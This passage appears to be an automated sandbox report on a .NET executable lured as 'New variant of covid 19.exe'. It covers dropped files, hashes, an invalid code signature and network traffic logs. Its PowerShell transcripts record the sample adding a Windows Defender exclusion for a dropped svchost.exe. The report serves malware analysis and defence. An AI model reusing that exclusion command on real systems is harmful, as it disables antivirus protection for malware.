                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oakhxzia.2dl.ps1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgtzpkku.luh.psm1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3ey4z3.avd.ps1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\Documents\20210309\PowerShell_transcript.936905.DbJYrCru.20210309221943.txt
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):5841
                                                                        Entropy (8bit):5.410656943651606
                                                                        Encrypted:false
                                                                        SSDEEP:96:BZ9hIN4qDo1ZDZchIN4qDo1Z9N31jZ/hIN4qDo1Z3oFF7Zw:2
                                                                        MD5:4F985C0A72158C34FD9CAF8686B952DD
                                                                        SHA1:7CA5EF31198C773BCBCFDF8BAD6F55BBC4A9439D
                                                                        SHA-256:E6738F98C50D65217366024C9D91F947446E839C3DB4B264183E6058E3D39FE9
                                                                        SHA-512:DDC9E224ECFCE24D376DB56E53AF237147979D286466D8CE805536A4A42F1F26F589860E857EDAE64FC6E513D2ABD6D477FE8128036DB1982C076EDD342CE3F8
                                                                        Malicious:false
                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210309222002..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 936905 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe -Force..Process ID: 6552..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210309222002..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210309222322..Username: computer\user..RunAs
                                                                        C:\Users\user\Documents\20210309\PowerShell_transcript.936905.LRCx2CiE.20210309221857.txt
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):5841
                                                                        Entropy (8bit):5.412521613239556
                                                                        Encrypted:false
                                                                        SSDEEP:96:BZmhINKqDo1Z4ZchINKqDo1ZGN31jZ+hINKqDo1ZgoFF7Zw:P
                                                                        MD5:2A650E566B7ED33E1F1B1D6A68A7CB77
                                                                        SHA1:E9C8CF5044CBB7E69E5D8990BBA8CB5B147B34A5
                                                                        SHA-256:0E40EE5ABB643DB654FEDC0CEEAB6FD2158142ECF4553B3D52B81444D896FA98
                                                                        SHA-512:BAD74E176C2A7FAB24B69CC06AFE9A3FD52D5758C661A8599599D3937129132B2B4A735AD83E726CE2CA13BE0A3AD216F968F242D97FA0C63F455E002AF94CCF
                                                                        Malicious:false
                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210309221909..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 936905 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe -Force..Process ID: 6864..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210309221909..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210309222322..Username: computer\user..RunAs
                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.247071799238702
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:New variant of covid 19.exe
                                                                        File size:45816
                                                                        MD5:a489513ca0de2472e0ad79830dd9ac44
                                                                        SHA1:b767fe686e074f551773f208e1cb756d114e38c4
                                                                        SHA256:df12835cd6bc77f9724900d2bf8f0403364ce6e8e81d389f8dc3b2eb8ca42961
                                                                        SHA512:e5cddfc3c32af524ab2ca1cb671034c0d46f1b3d4e83e98fb0fd5af198fbfbc93651e8381fcde18f40558994c5f2f76d6a8a6304dd4c7edc6de93a2ef912dd5c
                                                                        SSDEEP:768:A1+uC50TPNWMtxscrP3v0lH51S+T8rBItHvhZQ96xdfBu2uAHubhK:ApPT1x53vW1TSItPbJL
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....r..........."...0.................. ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x40b29e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0xBB7292A1 [Tue Aug 27 16:53:53 2069 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:C=kcFWAarjwdapdyUkLZLiDRQOeDLodXopXxPlVk, S=NEhdXbf, L=qyTkgVquhASRSKoKYwmGeM, T=mYPXLriIbXMrgagRzkuCZrKlYMbEKaSCodvj, E=UQKHEvtefJvMrDJdfPLSDmOMUnptYojksODsTRYRZBOUsZ, OU=dHTmcaEebRrKntayjdBvuldHxpfqPIScAcbl, O=lQjFUFZdRYmIRAZJMieSNcNHjAuWwuIgrbShGlf, CN=eXPQaJHXdamnWCRaxvyTm
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                        Not Before, Not After
                                                                        • 3/9/2021 10:48:18 AM 3/9/2022 10:48:18 AM
                                                                        Subject Chain
                                                                        • C=kcFWAarjwdapdyUkLZLiDRQOeDLodXopXxPlVk, S=NEhdXbf, L=qyTkgVquhASRSKoKYwmGeM, T=mYPXLriIbXMrgagRzkuCZrKlYMbEKaSCodvj, E=UQKHEvtefJvMrDJdfPLSDmOMUnptYojksODsTRYRZBOUsZ, OU=dHTmcaEebRrKntayjdBvuldHxpfqPIScAcbl, O=lQjFUFZdRYmIRAZJMieSNcNHjAuWwuIgrbShGlf, CN=eXPQaJHXdamnWCRaxvyTm
                                                                        Version:3
                                                                        Thumbprint MD5:BE5AD423DD7C907B424C8B9C2061CC99
                                                                        Thumbprint SHA-1:AD1BB85807FFF4B86998EDDBAB341DF7F850C8A0
                                                                        Thumbprint SHA-256:AE747540F8C83FC5D02AC93EE8D7802B5D28D7C526446BEB9948514E1324453C
                                                                        Serial:008C4D69E91A585A2AB4CFD46A96450C12

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb24c0x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x470.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x9e000x14f8
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x92a40x9400False0.517261402027data6.0971963196IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xc0000x4700x600False0.363932291667data4.07092781148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xe0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_VERSION0xc0580x418dataEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        LegalCopyright2016 IVXyhTJ WpOPFrinT
                                                                        Assembly Version7.4240.7372.1
                                                                        InternalNameYNcegbh OAaEntXrDdbrC.exe
                                                                        FileVersion0.2750.8344.3
                                                                        CompanyNameDdUPmLN kgoHVaSIjqNjSlvYSOE
                                                                        LegalTrademarksWfogltd FP
                                                                        CommentsFYpxhRj B
                                                                        ProductNameYNcegbh OAaEntXrDdbrC
                                                                        ProductVersion7.4240.7372.1
                                                                        FileDescriptionTeoRASq IJuqUHUDfjEOiPmPQpOhSr
                                                                        OriginalFilenameYNcegbh OAaEntXrDdbrC.exe
                                                                        Translation0x0409 0x04e4

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 9, 2021 22:18:42.739552975 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:42.777909040 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.778614044 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:42.779385090 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:42.819833040 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994386911 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994452953 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994492054 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994530916 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994538069 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:42.994570017 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994610071 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994611025 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:42.994672060 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994721889 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.157305002 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.157370090 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.157445908 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.157476902 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.157486916 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.157541990 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.158030987 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.158071041 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.158138037 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.158961058 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.158999920 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.159061909 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.159918070 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.159960985 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.160022020 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.160876036 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.160931110 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.161003113 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.161834955 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.161879063 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.161942005 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.162772894 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.162811041 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.162890911 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.163723946 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.163765907 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.163832903 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.164681911 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.164725065 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.164786100 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.165640116 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.165682077 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.165738106 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.166594028 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.166635990 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.166697979 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.167562008 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.167604923 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.167684078 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.168509960 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.168546915 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.168603897 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.169465065 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.169507980 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.170411110 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.170449018 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.170484066 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.170522928 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.171349049 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.171389103 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.171451092 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.172344923 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.172385931 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.172451973 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.173280954 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.195693016 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.195745945 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.195775986 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.196089029 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.196130991 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.196190119 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.197019100 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.197062969 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.197123051 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.197988033 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.198029995 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.198093891 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.198921919 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.198970079 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.199039936 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.199919939 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.199958086 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.200022936 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.200845957 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.200886965 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.200973034 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.201809883 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.201852083 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.201919079 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.202758074 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.202800989 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.202872992 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.203722000 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.204153061 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.204190969 CET8049710104.21.31.39192.168.2.3

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 9, 2021 22:18:35.156790018 CET5062053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:35.214279890 CET53506208.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:35.958956957 CET6493853192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:36.015307903 CET53649388.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:36.312427044 CET6015253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:36.362747908 CET53601528.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:37.489567041 CET5754453192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:37.543803930 CET53575448.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:38.942497015 CET5598453192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:38.990423918 CET53559848.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:40.257251978 CET6418553192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:40.306415081 CET53641858.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:41.586843967 CET6511053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:41.645558119 CET53651108.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:42.673446894 CET5836153192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:42.727751017 CET53583618.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:43.477384090 CET6349253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:43.532056093 CET53634928.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:44.413804054 CET6083153192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:44.463114023 CET53608318.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:45.340758085 CET6010053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:45.386722088 CET53601008.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:18:58.215456963 CET5319553192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:18:58.261562109 CET53531958.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:02.293376923 CET5014153192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:02.344770908 CET53501418.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:03.376585960 CET5302353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:03.422799110 CET53530238.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:03.552472115 CET4956353192.168.2.38.8.8.8
